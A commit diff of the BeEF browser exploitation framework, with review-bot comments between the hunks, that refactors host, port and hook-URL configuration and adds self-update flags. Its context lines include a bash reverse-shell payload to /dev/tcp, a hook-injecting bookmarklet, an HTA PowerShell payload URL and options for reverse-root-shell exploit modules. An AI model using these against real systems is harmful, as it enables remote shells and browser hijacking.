Release 0.5.2.0 (#2166)

* fixed offline zombie not deleting

* Bump jsdoc-to-markdown from 6.0.1 to 7.0.1 (#2161)

Bumps [jsdoc-to-markdown](https://github.com/jsdoc2md/jsdoc-to-markdown) from 6.0.1 to 7.0.1.
- [Release notes](https://github.com/jsdoc2md/jsdoc-to-markdown/releases)
- [Commits](https://github.com/jsdoc2md/jsdoc-to-markdown/compare/v6.0.1...v7.0.1)

---
updated-dependencies:
- dependency-name: jsdoc-to-markdown
  dependency-type: direct:development
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>

* Bug: Core - 1785 Fixed public hook url configuration settings (#2163)

* added spec file for testing changes

* added local host getter to configuration class

* added default value 0.0.0.0 for local host if it's not set

* added port config getter with default

* added port config getter with default

* fixed spelling errors for port

* added public configuration values and validation

* removed logic from public port as it was not required

* added beef host to configuration class

* added beef port to configuration class and removed default http.port logic from public_port

* fixed rubocop errors and refactored spec tests

* added beef host configuration values used for external resources

* added beef url to configuration

* added spec file for testing changes

* added local host getter to configuration class

* added default value 0.0.0.0 for local host if it's not set

* added port config getter with default

* added port config getter with default

* fixed spelling errors for port

* added public configuration values and validation

* removed logic from public port as it was not required

* added beef host to configuration class

* added beef port to configuration class and removed default http.port logic from public_port

* fixed rubocop errors and refactored spec tests

* added beef host configuration values used for external resources

* added beef url to configuration

* created command spec file

* add before statement to load all enabled modules to test command class

* add spec to check if configuration instance exists by setting and accessing a config variable

* updated http proto for beef host

* reverting changes on this file, dev values set

* removed some unnecessary checks

* fixed grammar test now we're only testing one configuration attribute

* added hook url for contextual usage

* refactoring admin_ui with new code usage

* fixed issue with the location of the beef.http.https.public_enabled

* refactored powershell module and extension

* adding the new config setting for public https being enabled

* refactor qrcode extension

* replace video fake plugin refactor

* social engineering refactoring

* phonegap module refactoring

* exploit refactoring

* network module refactoring

* ipec module refactoring

* host module refactoring

* debug refactoring

* browser refactoring

* social engineering extension refactoring

* core main server refactoring

* core main console banner refactoring

* removing dev test

* fixed area with location of http.https.enabled

* changed the hook url definition to return the hook file path

* updated banners to use new configuration getters

* updated extensions and modules with the hook url change

* added new public.host configuration settings and validations for deprecated usage of public

* updated to use public.port configuration

* added validation for old configuration public_port

* updated to use public https configuration setting

* updated config with new settings format

* fixed get to point to new locations

* fixed pointer to hook_file_path

* Update extensions/social_engineering/web_cloner/web_cloner.rb

Co-authored-by: bcoles <bcoles@gmail.com>

* updated enabled to enable

* making sure default configuration file does not have preset values

Co-authored-by: bcoles <bcoles@gmail.com>

* bumped versions to 0.5.2.0

* Usability: #2145. Added user input request for beef update within 'beef' install script (#2162)

* added user input request for beef update

* swapped git pull from system to backticks

* flags added for auto update and timeout to input

* updated install.txt to reference the update-beef script (#2160)

Co-authored-by: Andrew Wheatley <a@andrews-mini.home>
Co-authored-by: Isaac Powell <36595182+DeezyE@users.noreply.github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: bcoles <bcoles@gmail.com>
wheatley
2021-09-12 21:33:02 +10:00
committed by GitHub
parent c96b5e8968
commit b6425e4a90
59 changed files with 883 additions and 156 deletions

View File

@@ -67,5 +67,11 @@ it's best to regularly update BeEF to the latest version.
If you're using BeEF from the GitHub repository, updating is as simple as:
$ git pull
$ ./update-beef
Or pull the latest repo yourself and then update the gems with:
$ git pull
$ bundle

View File

@@ -4,4 +4,4 @@
# See the file 'doc/COPYING' for copying permission
#
0.5.1.0
0.5.2.0

beef
View File

@@ -42,6 +42,28 @@ $home_dir = File.expand_path("#{Dir.home}/.beef/", __FILE__).freeze
# @note Require core loader
#
require 'core/loader'
require 'timeout'
#
# @note Ask user if they would like to update beef
#
if BeEF::Core::Console::CommandLine.parse[:update_disabled] == false
if BeEF::Core::Console::CommandLine.parse[:update_auto] == true
print "Pulling latest BeEF repository and updating"
`git pull && bundle`
else
begin
answer = Timeout::timeout(5) do
print "Would you like to check and download the latest BeEF update? y/n: "
response = gets
`git pull && bundle` if response.strip == 'y'
end
rescue Timeout::Error
puts "\nUpdate Skipped with input timeout"
end
end
end
#
# @note Create ~/.beef/
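Review bot: The `Timeout::timeout(5)` block wraps `git pull && bundle` as well as the prompt, so when the user answers `y` the update itself is interrupted once five seconds have passed since the prompt appeared, and is then reported as "Update Skipped with input timeout". Read the answer inside the timeout and run the update after the block returns. `gets` returns nil on end of input, so `response.strip` needs a guard such as `response.to_s.strip`. Both update paths use backticks, which discard the command output and never check the exit status, so a failed pull or bundle goes unnoticed; `system` with a check of its return value would surface that. `answer` is assigned but never used, and `CommandLine.parse` is called twice where one local variable would do.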
@@ -109,13 +131,13 @@ end
#
# @note Validate beef.http.public and beef.http.public_port
#
unless config.get('beef.http.public').to_s.eql?('') || BeEF::Filters.is_valid_hostname?(config.get('beef.http.public'))
print_error "ERROR: Invalid public hostname: #{config.get('beef.http.public')}"
unless config.get('beef.http.public.host').to_s.eql?('') || BeEF::Filters.is_valid_hostname?(config.get('beef.http.public.host'))
print_error "ERROR: Invalid public hostname: #{config.get('beef.http.public.host')}"
exit 1
end
unless config.get('beef.http.public_port').to_s.eql?('') || BeEF::Filters.is_valid_port?(config.get('beef.http.public_port'))
print_error "ERROR: Invalid public port: #{config.get('beef.http.public_port')}"
unless config.get('beef.http.public.port').to_s.eql?('') || BeEF::Filters.is_valid_port?(config.get('beef.http.public.port'))
print_error "ERROR: Invalid public port: #{config.get('beef.http.public.port')}"
exit 1
end
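Review bot: The `# @note Validate beef.http.public and beef.http.public_port` comment above these checks still names the old keys; update it to `beef.http.public.host` and `beef.http.public.port`. The new `beef.http.public.https` setting gets no check here, so a quoted value such as "false" would reach `public_https_enabled?` as a truthy string; a boolean check next to these two would close that gap.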

View File

@@ -6,7 +6,7 @@
# BeEF Configuration file
beef:
version: '0.5.1.0'
version: '0.5.2.0'
# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
@@ -47,8 +47,14 @@ beef:
# Host Name / Domain Name
# If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
# set the public hostname below:
#public: "" # public hostname/IP address
# These settings will be used to create a public facing URL
# This public facing URL will be used for all hook related calls
# set the public setting below:
# public: ""
# host: "" # public hostname/IP address
# port: "" # public port will default to 80 if no https 443 if https
# and local if not set but there is a public host
# https: false # true/false
# Reverse Proxy / NAT
# If you want BeEF to be accessible behind a reverse proxy or NAT,
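Review bot: The `port` comment says the public port falls back to the local port "if not set but there is a public host", but `public_port` in the configuration class returns '443' or '80' whenever a public host is set, so the local port is only used when no public host is configured. Reword the comment to match the getter, for example: defaults to 443 with https, otherwise 80, when a public host is set.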
@@ -56,8 +62,6 @@ beef:
# NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
# by altering the X-FORWARDED-FOR ip address in the request header.
allow_reverse_proxy: false
#public: "" # public hostname/IP address
#public_port: "" # public port (experimental)
# Hook
hook_file: "/hook.js"
@@ -89,6 +93,8 @@ beef:
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# Enabled this config setting if you're external facing uri is using https
public_enabled: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.public (the domain name of the server where you run BeEF)
key: "beef_key.pem"
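Review bot: `public_enabled` is added under `beef.http.https`, but the getter `public_https_enabled?` reads `beef.http.public.https`, the key the new `public:` block documents. Nothing in the visible changes reads `beef.http.https.public_enabled`, so either drop this key or have the getter honour it; two switches for the same fact will drift apart. The new comment needs a grammar pass ("Enabled this", "you're external facing uri"), and the certificate note below still points at `beef.http.public` where the hostname now lives in `beef.http.public.host`.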

View File

@@ -42,7 +42,8 @@ module BeEF
# Two instances of this object are created during the execution of command module.
#
class Command
attr_reader :datastore, :path, :default_command_url, :beefjs_components, :friendlyname
attr_reader :datastore, :path, :default_command_url, :beefjs_components, :friendlyname,
:config
attr_accessor :zombie, :command_id, :session_id
include BeEF::Core::CommandUtils
@@ -55,15 +56,15 @@ module BeEF
# @param [String] key command module key
#
def initialize(key)
config = BeEF::Core::Configuration.instance
@config = BeEF::Core::Configuration.instance
@key = key
@datastore = {}
@friendlyname = config.get("beef.module.#{key}.name")
@friendlyname = @config.get("beef.module.#{key}.name")
@output = ''
@path = config.get("beef.module.#{key}.path")
@path = @config.get("beef.module.#{key}.path")
@default_command_url = config.get("beef.module.#{key}.mount")
@id = config.get("beef.module.#{key}.db.id")
@id = @config.get("beef.module.#{key}.db.id")
@auto_update_zombie = false
@results = {}
@beefjs_components = {}
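Review bot: The `@default_command_url = config.get("beef.module.#{key}.mount")` line was left on the bare `config` name while its neighbours moved to `@config`. It still runs only because the new `attr_reader :config` makes `config` resolve to the reader method; switch it to `@config.get(...)` so the assignment does not depend on that. The class comment for the new `:config` reader could also say why modules need direct access to the configuration.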

View File

@@ -73,9 +73,122 @@ module BeEF
return
end
return unless validate_public_config_variable?(@config)
if @config['beef']['http']['public_port']
print_error 'Config path beef.http.public_port is deprecated.'
print_error 'Please use the new format for public variables found'
print_error 'https://github.com/beefproject/beef/wiki/Configuration#web-server-configuration'
return
end
true
end
#
# Returns the configuration value for the http server host
# If nothing is set it should default to 0.0.0.0 (all interfaces)
def local_host
get('beef.http.host') || '0.0.0.0'
end
#
# Returns the configuration value for the http server port
# If nothing is set it should default to 3000
def local_port
get('beef.http.port') || '3000'
end
#
# Return the local protocol
# if nothing is set default to http
def local_proto
local_https_enabled ? 'https' : 'http'
end
#
# Returns the configuration value for the local https enabled
# If nothing is set it should default to false
def local_https_enabled
get('beef.http.https.enable') || false
end
#
# Returns the configuration value for the http server host
def public_host
get('beef.http.public.host')
end
#
# Returns the beef host which is used by external resources
# e.g. hooked browsers
def beef_host
public_host || local_host
end
#
# Returns the beef port which is used by external resource
# e.g. hooked browsers
def beef_port
public_port || local_port
end
def public_enabled?
!get('beef.http.public.host').nil?
end
#
# Returns the beef protocol that is used by external resources
# e.g. hooked browsers
def beef_proto
if public_enabled? && public_https_enabled? then
return 'https'
elsif public_enabled? && !public_https_enabled?
return 'http'
elsif !public_enabled?
return local_proto
end
end
#
# Returns the beef scheme://host:port for external resources
# e.g. hooked browsers
def beef_url_str
"#{beef_proto}://#{beef_host}:#{beef_port}"
end
# Returns the hool path value stored in the config file
#
# @return [String] hook file path
def hook_file_path
get('beef.http.hook_file') || '/hook.js'
end
# Returns the url to the hook file
#
# @return [String] the url string
def hook_url
"#{beef_url_str}#{hook_file_path}"
end
# Returns the configuration value for the http server port
# If nothing is set it should default to 3000
def public_port
return get('beef.http.public.port') unless get('beef.http.public.port').nil?
return '443' if public_https_enabled?
return '80' unless public_host.nil?
nil
end
#
# Returns the configuration value for the local https enabled
# If nothing is set it should default to false
def public_https_enabled?
get('beef.http.public.https') || false
end
#
# Returns the value of a selected key in the configuration file.
# @param [String] key Key of configuration item
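Review bot: `public_enabled?` and `beef_host` treat an empty string as a configured host: with `host: ""`, `!get('beef.http.public.host').nil?` is true and `public_host || local_host` returns "" because an empty string is truthy in Ruby, so `beef_url_str` becomes `http://:80`. The startup validation in `beef` accepts '' as unset (`.to_s.eql?('')`), so the two disagree; normalise blank values to nil in `public_host` and let `public_enabled?` call it. `beef_proto` can then shrink to a single conditional, since its third branch is the only remaining case. The doc comments on `public_host`, `public_port` and `public_https_enabled?` are copied from the local getters (`public_port` does not default to 3000), and "hool path" should read "hook path".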
@@ -163,6 +276,19 @@ module BeEF
)
end
end
private
def validate_public_config_variable?(config)
return true if (config['beef']['http']['public'].is_a?(Hash) ||
config['beef']['http']['public'].is_a?(NilClass))
print_error 'Config path beef.http.public is deprecated.'
print_error 'Please use the new format for public variables found'
print_error 'https://github.com/beefproject/beef/wiki/Configuration#web-server-configuration'
false
end
end
end
end
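Review bot: `config['beef']['http']['public']` raises NoMethodError when the loaded hash has no `beef` or `http` section, before either deprecation message can be printed, unless an earlier check already guarantees both exist. `config.dig('beef', 'http', 'public')` keeps the lookup nil-safe, and storing it in a local lets the condition read `public.nil? || public.is_a?(Hash)`. The `public_port` check in the previous hunk indexes the hash the same way and would benefit from the same change.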

View File

@@ -48,7 +48,8 @@ module Banners
def print_network_interfaces_count
# get the configuration information
configuration = BeEF::Core::Configuration.instance
beef_host = configuration.get('beef.http.host')
# local host
beef_host = configuration.local_host
# create an array of the interfaces the framework is listening on
if beef_host == '0.0.0.0' # the framework will listen on all interfaces
@@ -77,27 +78,26 @@ module Banners
#
def print_network_interfaces_routes
configuration = BeEF::Core::Configuration.instance
proto = configuration.get("beef.http.https.enable") == true ? 'https' : 'http'
hook_file = configuration.get("beef.http.hook_file")
# local config settings
proto = configuration.local_proto
hook_file = configuration.hook_file_path
admin_ui = configuration.get("beef.extension.admin_ui.enable") ? true : false
admin_ui_path = configuration.get("beef.extension.admin_ui.base_path")
# display the hook URL and Admin UI URL on each interface from the interfaces array
self.interfaces.map do |host|
print_info "running on network interface: #{host}"
port = configuration.get("beef.http.port")
port = configuration.local_port
data = "Hook URL: #{proto}://#{host}:#{port}#{hook_file}\n"
data += "UI URL: #{proto}://#{host}:#{port}#{admin_ui_path}/panel\n" if admin_ui
print_more data
end
# display the public hook URL and Admin UI URL
if configuration.get("beef.http.public")
host = configuration.get('beef.http.public')
port = configuration.get("beef.http.public_port") || configuration.get('beef.http.port')
if configuration.public_enabled?
print_info 'Public:'
data = "Hook URL: #{proto}://#{host}:#{port}#{hook_file}\n"
data += "UI URL: #{proto}://#{host}:#{port}#{admin_ui_path}/panel\n" if admin_ui
data = "Hook URL: #{configuration.hook_url}\n"
data += "UI URL: #{configuration.beef_url_str}#{admin_ui_path}/panel\n" if admin_ui
print_more data
end
end
@@ -130,9 +130,9 @@ module Banners
def print_websocket_servers
config = BeEF::Core::Configuration.instance
ws_poll_timeout = config.get('beef.http.websocket.ws_poll_timeout')
print_info "Starting WebSocket server ws://#{config.get('beef.http.host')}:#{config.get("beef.http.websocket.port").to_i} [timer: #{ws_poll_timeout}]"
print_info "Starting WebSocket server ws://#{config.beef_host}:#{config.get("beef.http.websocket.port").to_i} [timer: #{ws_poll_timeout}]"
if config.get("beef.http.websocket.secure")
print_info "Starting WebSocketSecure server on wss://[#{config.get('beef.http.host')}:#{config.get("beef.http.websocket.secure_port").to_i} [timer: #{ws_poll_timeout}]"
print_info "Starting WebSocketSecure server on wss://[#{config.beef_host}:#{config.get("beef.http.websocket.secure_port").to_i} [timer: #{ws_poll_timeout}]"
end
end
end
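Review bot: Both WebSocket banner lines now print `config.beef_host`, which returns the public host whenever one is configured, while the message reports a server being started. If the listener binds to the local address, `config.local_host` is the value to show here, with the public address printed separately as the route banner does. The `wss://[#{...}` string also carries a stray `[` over from the old line; remove it while this line is being touched.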

View File

@@ -19,6 +19,8 @@ module BeEF
@options[:port] = ""
@options[:ws_port] = ""
@options[:interactive] = false
@options[:update_disabled] = false
@options[:update_auto] = false
@already_parsed = false
@@ -55,6 +57,14 @@ module BeEF
@options[:ws_port] = ws_port
end
opts.on('-ud', '--update_disabled', 'Skips update') do
@options[:update_disabled] = true
end
opts.on('-ua', '--update_auto', 'Automatic update with no prompt') do
@options[:update_auto] = true
end
#opts.on('-i', '--interactive', 'Starts with the Console Shell activated') do
# @options[:interactive] = true
#end
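Review bot: OptionParser short switches are a single character, so `'-ud'` and `'-ua'` both register `-u`, with the trailing letter read as an argument placeholder; the two definitions collide and the long forms may end up expecting an argument. Check the result with `./beef -h`, then either give each flag its own single letter or define only `--update_disabled` and `--update_auto`. The help strings could also say that the default is an interactive prompt with a timeout.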

View File

@@ -12,19 +12,12 @@ module BeEF
module Core
class Server
include Singleton
# @note Grabs the version of beef the framework is deployed on
VERSION = BeEF::Core::Configuration.instance.get('beef.version')
attr_reader :root_dir, :url, :configuration, :command_urls, :mounts, :semaphore
def initialize
@configuration = BeEF::Core::Configuration.instance
beef_proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
@url = "#{beef_proto}://#{beef_host}:#{beef_port}"
@root_dir = File.expand_path('../../../', __FILE__)
@url = @configuration.beef_url_str
@root_dir = File.expand_path('../../../', __dir__)
@command_urls = {}
@mounts = {}
@rack_app
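Review bot: `@root_dir` switched from `__FILE__` to `__dir__` but kept the same `'../../../'` prefix. `__dir__` is already one level above `__FILE__`, so the same number of `..` segments now resolves one directory higher than before, and `beef_root_dir` would point outside the checkout. Drop one segment (`File.expand_path('../../', __dir__)`) or keep `__FILE__`.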
@@ -33,16 +26,16 @@ module BeEF
def to_h
{
'beef_version' => VERSION,
'beef_url' => @url,
'beef_root_dir' => @root_dir,
'beef_host' => @configuration.get('beef.http.host'),
'beef_port' => @configuration.get('beef.http.port'),
'beef_public' => @configuration.get('beef.http.public'),
'beef_public_port' => @configuration.get('beef.http.public_port'),
'beef_hook' => @configuration.get('beef.http.hook_file'),
'beef_proto' => @configuration.get('beef.http.https.enable') == true ? 'https' : 'http',
'client_debug' => @configuration.get('beef.client_debug')
'beef_version' => @configuration.get('beef_version'),
'beef_url' => @url,
'beef_root_dir' => @root_dir,
'beef_host' => @configuration.beef_host,
'beef_port' => @configuration.beef_port,
'beef_public' => @configuration.public_host,
'beef_public_port' => @configuration.public_port,
'beef_hook' => @configuration.get('beef.http.hook_file'),
'beef_proto' => @configuration.beef_proto,
'client_debug' => @configuration.get('beef.client_debug')
}
end
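Review bot: `'beef_version'` used to come from `VERSION`, which was read from `beef.version`; the replacement calls `@configuration.get('beef_version')`, a different key that the configuration file shown in this commit does not define, so the value is likely nil. Use `@configuration.get('beef.version')`. `'beef_hook'` could also use the new `hook_file_path` getter so it shares the '/hook.js' default.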

View File

@@ -7,12 +7,7 @@
WelcomeTab = function() {
<%
@configuration = BeEF::Core::Configuration.instance
beef_proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http";
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
beef_hook = @configuration.get("beef.http.hook_file")
hook_url = "#{beef_proto}://#{beef_host}:#{beef_port}/#{beef_hook}"
hook_url = BeEF::Core::Configuration.instance.hook_url
%>
var bookmarklet = "javascript:%20(function%20()%20{%20var%20url%20=%20%27<%= hook_url %>%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();"

View File

@@ -111,8 +111,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
listeners: {
itemclick: function(item, object) {
var hb_id = this.contextNode.id.split('zombie-online-')[1];
var hb_id_off = this.contextNode.id.split('zombie-offline-')[1];
var hb_id = this.contextNode.id.split('-')[2];
switch (item.id) {
case 'use_as_proxy':
Ext.Ajax.request({
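Review bot: `this.contextNode.id.split('-')[2]` returns only the third dash-separated segment, so it is correct for `zombie-online-<id>` and `zombie-offline-<id>` only while the id itself contains no `-`. If ids can ever contain a dash, strip the prefix instead, for example `this.contextNode.id.replace(/^zombie-(online|offline)-/, '')`, which also documents the two node types being handled.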

View File

@@ -19,9 +19,9 @@ module Qrcode
# get server config
configuration = BeEF::Core::Configuration.instance
beef_proto = configuration.get('beef.http.https.enable') == true ? "https" : "http"
beef_host = configuration.get("beef.http.public") || configuration.get("beef.http.host")
beef_port = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
beef_proto = configuration.beef_proto
beef_host = configuration.beef_host
beef_port = configuration.beef_port
# get URLs from QR config
configuration.get("beef.extension.qrcode.targets").each do |target|

View File

@@ -28,11 +28,10 @@ module BeEF
# serves the HTML Application (HTA)
get '/hta' do
response['Content-Type'] = "application/hta"
host = BeEF::Core::Configuration.instance.get('beef.http.public') || BeEF::Core::Configuration.instance.get('beef.http.host')
port = BeEF::Core::Configuration.instance.get('beef.http.public_port') || BeEF::Core::Configuration.instance.get('beef.http.port')
proto = BeEF::Core::Configuration.instance.get("beef.http.https.enable") == true ? "https" : "http"
ps_url = BeEF::Core::Configuration.instance.get('beef.extension.social_engineering.powershell.powershell_handler_url')
payload_url = "#{proto}://#{host}:#{port}#{ps_url}/ps.png"
@config = BeEF::Core::Configuration.instance
beef_url_str = @config.beef_url_str
ps_url = @config.get('beef.extension.social_engineering.powershell.powershell_handler_url')
payload_url = "#{beef_url_str}#{ps_url}/ps.png"
print_info "Serving HTA. Powershell payload will be retrieved from: #{payload_url}"
"<script>

View File

@@ -14,10 +14,7 @@ module BeEF
@http_server = BeEF::Core::Server.instance
@config = BeEF::Core::Configuration.instance
@cloned_pages_dir = "#{File.expand_path('../../../../extensions/social_engineering/web_cloner', __FILE__)}/cloned_pages/"
beef_proto = @config.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @config.get("beef.http.public") || @config.get("beef.http.host")
beef_port = @config.get("beef.http.public_port") || @config.get("beef.http.port")
@beef_hook = "#{beef_proto}://#{beef_host}:#{beef_port}#{@config.get('beef.http.hook_file')}"
@beef_hook = "#{@config.hook_url}"
end
def clone_page(url, mount, use_existing, dns_spoof)
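Review bot: `@beef_hook = "#{@config.hook_url}"` interpolates a value that is already a string; assign it directly with `@beef_hook = @config.hook_url`.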

View File

@@ -7,9 +7,9 @@ class Deface_web_page < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
favicon_uri = "#{base_host}/ui/media/images/favicon.ico"
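Review bot: `base_host` is still assembled by hand from `beef_proto`, `beef_host` and `beef_port`, which is exactly what the new `beef_url_str` getter returns. Replace the three locals and the interpolation with `base_host = @configuration.beef_url_str` so the URL format lives in one place; the same applies to the Get_stored_credentials, Site_redirect_iframe, Play_sound and Clickjacking hunks.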

View File

@@ -7,9 +7,9 @@ class Get_stored_credentials < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
uri = "#{base_host}/demos/butcher/index.html"

View File

@@ -7,9 +7,9 @@ class Site_redirect_iframe < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
favicon_uri = "#{base_host}/ui/media/images/favicon.ico"

View File

@@ -9,9 +9,9 @@ class Play_sound < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
sound_file_url = "#{base_host}/demos/sound.wav"

View File

@@ -13,8 +13,8 @@ class Test_network_request < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
hook_path = @configuration.get("beef.http.hook_file")
return [
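Review bot: `hook_path` still reads `@configuration.get("beef.http.hook_file")` directly, so it misses the '/hook.js' default that the new `hook_file_path` getter applies when the key is unset. Use `@configuration.hook_file_path` here, as the Phonegap_persistence hunk does.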

View File

@@ -7,7 +7,7 @@ class Apache_felix_remote_shell < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
lhost = configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },

View File

@@ -3,7 +3,7 @@ class Farsite_x25_remote_shell < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_host = @configuration.beef_host
return [
{ 'name' => 'scheme', 'type' => 'combobox', 'ui_label' => 'HTTP(s)', 'store_type' => 'arraystore',
'store_fields' => ['http'], 'store_data' => [['HTTP'],['HTTPS']],

View File

@@ -7,7 +7,7 @@ class Jenkins_groovy_code_exec < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
lhost = configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1' },

View File

@@ -11,7 +11,7 @@ class Java_payload < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_host = @configuration.beef_host
return [
{'name' => 'conn', 'ui_label' => 'Payload', 'value' => 'ReverseTCP'},
{'name' => 'cbHost', 'ui_label' => 'Connect Back to Host', 'value' => beef_host},

View File

@@ -14,7 +14,7 @@ class Signed_applet_dropper < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_host = @configuration.beef_host
return [
{'name' => 'dropper_url', 'ui_label' => 'Dropper URL', 'value' => 'http://dropper_url/'},
{'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Oracle Secure Applet'},

View File

@@ -10,7 +10,7 @@ class Monowall_reverse_root_shell_csrf < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
lhost = @configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'},

View File

@@ -10,7 +10,7 @@ class Freenas_reverse_root_shell_csrf < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
lhost = @configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'},

View File

@@ -7,7 +7,7 @@ class Pfsense_reverse_root_shell_csrf < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
lhost = @configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'},

View File

@@ -149,7 +149,7 @@ EOS
def self.options
configuration = BeEF::Core::Configuration.instance
lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
lhost = configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rproto',

View File

@@ -7,7 +7,7 @@ class Wipg1000_cmd_injection < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
lhost = @configuration.beef_host
lhost = '' if lhost.to_s.eql?('0.0.0.0')
return [

View File

@@ -7,7 +7,7 @@ class Shell_shock_scanner < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
lhost = configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'method', 'ui_label' => 'HTTP Method', 'value' => 'GET' },

View File

@@ -7,7 +7,7 @@ class Shell_shocked < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
lhost = configuration.beef_host
lhost = "LHOST" if lhost == "0.0.0.0"
payload = "/bin/bash -i >& /dev/tcp/#{lhost}/LPORT 0>&1"

View File

@@ -16,7 +16,7 @@ class Vtiger_crm_upload_exploit < BeEF::Core::Command
end
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_host = @configuration.beef_host
return [
{'name'=>'vtiger_url', 'ui_label' =>'Target Web Server','value'=>'http://vulnerable-vtiger.site','width'=>'400px'},
{'name'=>'vtiger_filepath','ui_label'=>'Target Directory','value'=>'/storage/'+time.year.to_s()+'/'+time.strftime("%B")+'/week'+weekno.to_s()+'/','width'=>'400px'},

View File

@@ -10,7 +10,7 @@ class Wanem_command_execution < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
lhost = @configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'},

View File

@@ -10,7 +10,7 @@ class Zenoss_command_execution < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
